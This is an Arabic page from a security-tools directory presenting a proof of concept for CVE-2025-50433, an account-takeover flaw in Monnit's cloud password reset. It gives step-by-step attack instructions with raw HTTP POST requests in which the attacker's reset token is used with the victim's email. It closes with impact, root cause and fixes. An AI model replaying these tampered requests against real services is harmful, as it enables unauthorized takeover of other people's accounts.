Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-50433 — إثبات مفهوم لاختراق حساب Monnit Cloud الحرج (CVE-2025-50433)، يستغل غياب التحقق من الرمز مقابل البريد الإلكتروني في إعادة تعيين كلمة المرور، ويوفّر خطوات الهجوم والسبب الجذري والإصلاح. | Kitploit
أدوات/GitHubGitHub/0xmandor/cve-2025-50433
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالمصادقة
GitHub0xmandor/cve-2025-50433

CVE-2025-50433

إثبات مفهوم لاختراق حساب Monnit Cloud الحرج (CVE-2025-50433)، يستغل غياب التحقق من الرمز مقابل البريد الإلكتروني في إعادة تعيين كلمة المرور، ويوفّر خطوات الهجوم والسبب الجذري والإصلاح.

عرض المستودع
1منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-50433 — ثغرة خطيرة للاستيلاء على الحسابات تؤثر على منصات Monnit السحابية (*.imonnit.com)

ملخص

توجد ثغرة خطيرة في المصادقة عبر *.imonnit.com تسمح بـ الاستيلاء الكامل على الحساب (ATO) على أي حساب مستخدم دون تفاعل الضحية.

يفشل الجزء الخلفي في التحقق من الارتباط بين رمز إعادة تعيين كلمة المرور والبريد الإلكتروني المستهدف، مما يمكن المهاجمين من استخدام رمز إعادة التعيين الصالح الخاص بهم لإعادة تعيين كلمة مرور أي حساب ضحية.


ناقل الهجوم (إثبات المفهوم خطوة بخطوة)

  1. المهاجم ينشئ حساب A ([email protected]).
  2. الضحية لديها حساب B ([email protected]).
  3. المهاجم يطلب إعادة تعيين كلمة المرور لكل من A و B.
  4. المهاجم يتلقى رمز إعادة تعيين صالح للحساب A فقط.
  5. المهاجم يفتح نموذج إعادة تعيين كلمة المرور باستخدام الرمز A:
root@kitploit:~
    POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
    Host: www.imonnit.com
    Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2

    __RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
  1. قبل الإرسال، المهاجم يغير حقلي البريد الإلكتروني واسم المستخدم إلى بريد الضحية الإلكتروني:
root@kitploit:~
    POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
    Host: www.imonnit.com
    Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2

    __RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
  1. الجزء الخلفي يقبل بشكل غير صحيح البريد الإلكتروني + الرمز غير المتطابقين.
  2. يتم إعادة تعيين كلمة مرور الضحية، ويحصل المهاجم على وصول كامل إلى حساب الضحية.

التأثير

  • الاستيلاء الكامل على الحساب (ATO).
  • وصول كامل إلى لوحات التحكم وأجهزة الاستشعار وبيانات الحساب للضحية.
  • القدرة على تعديل الأجهزة والإشعارات والإعدادات.
  • تصعيد الصلاحيات دون تفاعل الضحية.
  • استغلال عن بعد دون متطلبات مسبقة.

شدّة الخطورة

CVSS 3.1: 9.8 (حرجة)
المتجه: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


النطاقات المتأثرة

root@kitploit:~
*.imonnit.com

السبب الجذري

لا يقوم نقطة نهاية إعادة تعيين كلمة المرور بالتحقق من أن رمز إعادة التعيين ينتمي إلى نفس البريد الإلكتروني المقدم أثناء عملية إعادة التعيين، مما يتيح إعادة تعيين كلمة المرور بشكل عشوائي باستخدام رموز يتحكم فيها المهاجم.


نقطة النهاية المتأثرة

root@kitploit:~
/Account/PasswordReset/

البائع: Monnit Corporation


التوصيات

  • فرض التحقق الصارم من ربط الرمز بالبريد الإلكتروني على الجزء الخلفي.
  • رفض أي طلب إعادة تعيين كلمة مرور حيث لا يتطابق الرمز مع الحساب المرتبط.
  • إبطال الرموز فور استخدامها.

المكتشف

Mohamed Mandor (0xmandor) GitHub: https://github.com/0xmandor

تنزيل الأداة